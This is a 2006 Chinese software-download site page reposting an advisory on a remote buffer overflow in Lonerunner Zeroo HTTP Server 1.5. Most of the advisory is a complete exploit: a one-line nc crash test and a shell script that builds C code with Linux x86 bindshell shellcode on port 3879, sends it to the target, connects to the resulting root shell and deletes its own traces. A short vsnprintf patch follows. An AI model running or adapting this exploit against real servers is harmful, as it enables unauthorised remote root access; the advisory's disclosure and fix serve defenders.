文章分类 | 软件分类 | 最新软件 | 杀毒软件 | 实用软件  | MTV下载  | 设为首页 |
  | 下载分类 | 最近更新
您的位置: 首页 >> 文章首页 >> 网络冲浪 >> 防范措施 >>  
防范措施点击TOP10
·McAfee发出培果蠕虫变种Bagle.aq警告2006-2-6 7:06:59
·不要把秘密留在网吧2006-2-5 12:24:19
·木马清除百种方法2006-2-5 12:45:22
·有效防范IP地址泄漏2006-2-8 21:58:00
·美女图片盗取QQ号 三招拆穿病毒真面目(图)2006-2-6 6:29:59
·怎样防止蓝屏攻击?2006-2-5 12:51:10
·网友不要再担心! 网吧“防黑策略”大放送2006-2-5 20:43:12
·在网络钓鱼攻击的幕后2006-2-8 18:56:52
·网管软件很受伤:让它们彻底地失去作用2006-2-5 20:43:01
·警惕DoS的路由器攻击2006-2-5 13:51:29
网络冲浪点击TOP10
·去除IE地址栏中的网址2006-2-5 12:45:08
·入侵检测系统之LIDS篇2006-2-5 10:58:21
·IP网络路由技术2006-2-9 19:14:24
·让“TE”变“IE”的移花接木大法2006-2-5 19:26:30
·巧改设置强化3389入侵2006-2-6 9:00:42
·我的常州装饰网如何建立的2006-2-5 13:35:30
·用Ipconfig获取最新的网络配置2006-2-6 10:14:20
·海阳asp木马的漏洞2006-2-5 13:51:57
·[常用]另类可执行文件压缩软件PECompact2006-2-6 7:50:02
·很酷的一篇入侵分析2006-2-5 12:35:56

 
Lonerunner Zeroo HTTP Server存在远程缓冲溢出问题
作者:我去下载           时间:2006-2-9 18:45:57


Lonerunner Zeroo HTTP Server存在远程缓冲溢出问题

所影响的操作系统和应用程序 :
Lonerunner Zeroo HTTP Server 1.5

描述:
Zeroo HTTP对部分超长请求检查不正确,超长的字符串请求可导致WEB服务产生缓冲溢出,可以覆盖堆栈内容执行任意代码。

测试代码:
bash$ (echo "`perl -e 'print \"\xaa\"x1024'`";cat)nc 0 8000 # 0xaa,0xff,etc...

#!/bin/sh
#
# 0x82-Zer00.sh Zeroo HTTP Server Remote root exploit for Linux
#
# __
# exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
# My World: http://x82.i21c.net
#
(printf "\n 0x82-Zer00.sh Zeroo HTTP Server Remote root exploit");
(printf "\n by x82 in INetCop(c)\n\n");
#
if [ "$2" = "" ]; then
(printf " Usage: 0x82-Zer00.sh [hostname] [port]\n\n");
exit; fi
#
cat >0x82-Remote-Zeroosubugxpl.c<< X82X82
#define Xpl017Elz x82
int main(/* args? */) {
int num;
char b1ndsh[] = /* Linux(x86) bindshell on port 3879 */
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
for(num=0;num<0xa4;num+=4)
printf("\xc0\xf4\xff\xbf"); // this's &shellcode
for(num=0;num<0x02a8-strlen(b1ndsh);num++)
printf("N"); /* nop...NNNNNNNNNNNNN...NNNNNNNNNNNNN;;; */
printf("%s",b1ndsh); /* shellcode */
for(num=0;num<0xb4;num++)
printf("\xff"); /* byteother */
printf("\r\n");
}
X82X82
#
(printf " { 0x00. Compile exploit. }\n");
make 0x82-Remote-Zeroosubugxpl
(printf " { 0x01. Send code ! }\n");
(./0x82-Remote-Zeroosubugxpl;cat)nc $1 $2 &
(printf " { 0x02. OK, Try $1:3879 ... }\n");
nc $1 3879
(printf " { 0x03. Connection closed. }\n");
#
(printf " { 0x04. Delete exploit code. }\n");
rm -f 0x82-Remote-Zeroosubugxpl*
(printf " { 0x05. End :-}\n\n");
#

解决方案:
临时"dong-h0un U" <xploit@hackermail.com>提供的补丁:

=== http.patch ===

--- http.cpp Fri Apr 12 13:26:24 2002
+++ http.patch.cpp Tue Nov 10 00:28:13 2002
@@ -70,7 +70,7 @@
va_list arglist;

va_start(arglist, message);
- vsprintf(buffer, message, arglist);
+ vsnprintf(buffer, MAX_CONN_BUF, message, arglist);
va_end(arglist);

strncpy(in+strlen(in), buffer, strlen(buffer));

=== eof ===

分页:
相关文章:
Copyright© 2005-2006 wqxz.com, All Rights Reserved. 购买虚拟主机请与本站联系